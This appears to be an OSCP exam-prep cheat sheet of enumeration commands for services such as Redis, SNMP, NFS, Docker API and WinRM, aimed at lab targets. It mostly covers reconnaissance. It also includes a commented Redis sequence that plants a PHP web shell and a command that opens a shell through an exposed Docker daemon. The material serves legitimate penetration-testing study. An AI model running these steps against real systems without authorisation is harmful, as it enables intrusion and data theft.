######################################################################
# 06 – LESS COMMON SERVICE ENUMERATION (OSCP 2025 — UPGRADED)
######################################################################

======================================================================
# 1. FTP ENUMERATION
======================================================================

# Anonymous login test
ftp $targetip
# username: anonymous

# Check write permissions
put test.txt

# Banner grab
nc -nv $targetip 21


======================================================================
# 2. SMTP ENUMERATION (VRFY / EXPN)
======================================================================

nc -nv $targetip 25
VRFY root
VRFY admin
VRFY test
EXPN users

# Nmap SMTP user scan
nmap --script smtp-enum-users -p25 $targetip

# Basic banner grab
openssl s_client -connect $targetip:25 -starttls smtp


======================================================================
# 3. REDIS ENUMERATION (Often Misconfigured)
======================================================================

redis-cli -h $targetip
INFO
CONFIG GET *
KEYS *
GET <key>

# Redis RCE (only if writable)
# CONFIG SET dir /var/www/html
# CONFIG SET dbfilename shell.php
# SET shell "<?php system($_GET['cmd']); ?>"
# SAVE


======================================================================
# 4. MYSQL ENUMERATION
======================================================================

# Test empty root login
mysql -h $targetip -u root
mysql -h $targetip -u root -p''

# Enumerate
SHOW DATABASES;
SELECT user,host FROM mysql.user;
USE <db>;
SHOW TABLES;


======================================================================
# 5. POSTGRESQL ENUMERATION
======================================================================

psql -h $targetip -U postgres

# Useful commands:
\l      # list databases
\dt     # list tables
SELECT version();
SELECT * FROM pg_user;


======================================================================
# 6. MONGODB ENUMERATION
======================================================================

# Check if no auth
mongo --host $targetip

show dbs
use admin
db.runCommand({ usersInfo: 1 })


======================================================================
# 7. JAVA RMI ENUMERATION (Port 1099)
======================================================================

nmap -p 1099 --script=rmi-dumpregistry $targetip
nmap -p 1099 --script=rmi-vuln-classloader $targetip


======================================================================
# 8. RPCBIND / NFS ENUMERATION
======================================================================

# Check RPC services
rpcinfo -p $targetip

# Check NFS shares
showmount -e $targetip

# Mount share
mount -t nfs $targetip:/share /mnt/nfs


======================================================================
# 9. SNMP ENUMERATION
======================================================================

onesixtyone $targetip
snmpwalk -v1 -c public $targetip
snmpwalk -v2c -c public $targetip

# Users
snmpwalk -v2c -c public $targetip 1.3.6.1.4.1.77.1.2.25

# Running processes
snmpwalk -v2c -c public $targetip 1.3.6.1.2.1.25.4.2.1.2


======================================================================
# 10. RSYNC ENUMERATION (Port 873)
======================================================================

# List rsync modules
rsync rsync://$targetip/

# Pull files
rsync -av rsync://$targetip/share .


======================================================================
# 11. DOCKER API ENUM (Very common in labs)
======================================================================

curl http://$targetip:2375/containers/json

# Full container shell if open:
docker -H tcp://$targetip:2375 run -it alpine sh


======================================================================
# 12. MEMCACHED ENUM (Port 11211)
======================================================================

# Check if open
nc $targetip 11211
stats
stats items
get <key>


======================================================================
# 13. ELASTICSEARCH ENUM (Port 9200/9300)
======================================================================

curl http://$targetip:9200/
curl http://$targetip:9200/_cat/indices?v
curl http://$targetip:9200/_cluster/health?pretty


======================================================================
# 14. VNC ENUMERATION
======================================================================

# Banner grab
nmap -sV -p5900 $targetip

# Check for no-auth
vncsnapshot $targetip:0 screenshot.jpg


======================================================================
# 15. IMAP / POP3 ENUMERATION
======================================================================

# IMAP
openssl s_client -connect $targetip:143 -starttls imap

# POP3
openssl s_client -connect $targetip:110 -starttls pop3


======================================================================
# 16. LDAP / SMB SIGNING CHECK (Relay Prereqs)
======================================================================

netexec smb $targetip --signing
netexec ldap $targetip --signing


======================================================================
# 17. WINRM QUICK ENUMERATION
======================================================================

# Check if WinRM is open
crackmapexec winrm $targetip
netexec winrm $targetip

# Check credentials
netexec winrm $targetip -u $user -p "$password"


======================================================================
# 18. MDNS / LLMNR / NBNS ENUMERATION
======================================================================

# Check mDNS
nmap -sU -p 5353 $targetip

# Check LLMNR
tcpdump -i tun0 udp port 5355

# NBNS (Responder-related)
tcpdump -i tun0 udp port 137


======================================================================
# 19. RDP QUICK ENUM
======================================================================

nmap -p3389 --script rdp-ntlm-info,rdp-enum-encryption $targetip


######################################################################
# END OF LESS COMMON SERVICE ENUM (FULL UPGRADE)
######################################################################

